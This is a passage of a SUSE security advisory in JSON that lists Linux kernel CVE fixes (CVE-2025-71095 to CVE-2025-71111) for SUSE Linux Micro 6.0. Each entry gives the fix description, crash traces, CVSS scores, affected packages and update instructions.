"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71095",
"url": "https://www.suse.com/security/cve/CVE-2025-71095"
},
{
"category": "external",
"summary": "SUSE Bug 1256605 for CVE-2025-71095",
"url": "https://bugzilla.suse.com/1256605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71096",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71096"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly\n\nThe netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a\nLS_NLA_TYPE_DGID attribute, it is invalid if it does not.\n\nUse the nl parsing logic properly and call nla_parse_deprecated() to fill\nthe nlattrs array and then directly index that array to get the data for\nthe DGID. Just fail if it is NULL.\n\nRemove the for loop searching for the nla, and squash the validation and\nparsing into one function.\n\nFixes an uninitialized read from the stack triggered by userspace if it\ndoes not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE\nquery.\n\n BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]\n BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n hex_byte_pack include/linux/hex.h:13 [inline]\n ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509\n ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633\n pointer+0xc09/0x1bd0 lib/vsprintf.c:2542\n vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930\n vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279\n vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426\n vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465\n vprintk+0x36/0x50 kernel/printk/printk_safe.c:82\n _printk+0x17e/0x1b0 kernel/printk/printk.c:2475\n ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]\n ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141\n rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]\n rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]\n rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:714 [inline]\n __sock_sendmsg+0x333/0x3d0 net/socket.c:729\n ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617\n ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671\n __sys_sendmsg+0x1aa/0x300 net/socket.c:2703\n __compat_sys_sendmsg net/compat.c:346 [inline]\n __do_compat_sys_sendmsg net/compat.c:353 [inline]\n __se_compat_sys_sendmsg net/compat.c:350 [inline]\n __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350\n ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306\n do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331\n do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71096",
"url": "https://www.suse.com/security/cve/CVE-2025-71096"
},
{
"category": "external",
"summary": "SUSE Bug 1256606 for CVE-2025-71096",
"url": "https://bugzilla.suse.com/1256606"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71096"
},
{
"cve": "CVE-2025-71097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71097",
"url": "https://www.suse.com/security/cve/CVE-2025-71097"
},
{
"category": "external",
"summary": "SUSE Bug 1256607 for CVE-2025-71097",
"url": "https://bugzilla.suse.com/1256607"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71098"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71098",
"url": "https://www.suse.com/security/cve/CVE-2025-71098"
},
{
"category": "external",
"summary": "SUSE Bug 1256591 for CVE-2025-71098",
"url": "https://bugzilla.suse.com/1256591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71100",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71100"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71100",
"url": "https://www.suse.com/security/cve/CVE-2025-71100"
},
{
"category": "external",
"summary": "SUSE Bug 1256593 for CVE-2025-71100",
"url": "https://bugzilla.suse.com/1256593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71108",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71108"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: Handle incorrect num_connectors capability\n\nThe UCSI spec states that the num_connectors field is 7 bits, and the\n8th bit is reserved and should be set to zero.\nSome buggy FW has been known to set this bit, and it can lead to a\nsystem not booting.\nFlag that the FW is not behaving correctly, and auto-fix the value\nso that the system boots correctly.\n\nFound on Lenovo P1 G8 during Linux enablement program. The FW will\nbe fixed, but seemed worth addressing in case it hit platforms that\naren\u0027t officially Linux supported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71108",
"url": "https://www.suse.com/security/cve/CVE-2025-71108"
},
{
"category": "external",
"summary": "SUSE Bug 1256774 for CVE-2025-71108",
"url": "https://bugzilla.suse.com/1256774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71108"
},
{
"cve": "CVE-2025-71111",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71111"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (w83791d) Convert macros to functions to avoid TOCTOU\n\nThe macro FAN_FROM_REG evaluates its arguments multiple times. When used\nin lockless contexts involving shared driver data, this leads to\nTime-of-Check to Time-of-Use (TOCTOU) race conditions, potentially\ncausing divide-by-zero errors.\n\nConvert the macro to a static function. This guarantees that arguments\nare evaluated only once (pass-by-value), preventing the race\nconditions.\n\nAdditionally, in store_fan_div, move the calculation of the minimum\nlimit inside the update lock. This ensures that the read-modify-write\nsequence operates on consistent data.\n\nAdhere to the principle of minimal changes by only converting macros\nthat evaluate arguments multiple times and are used in lockless\ncontexts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
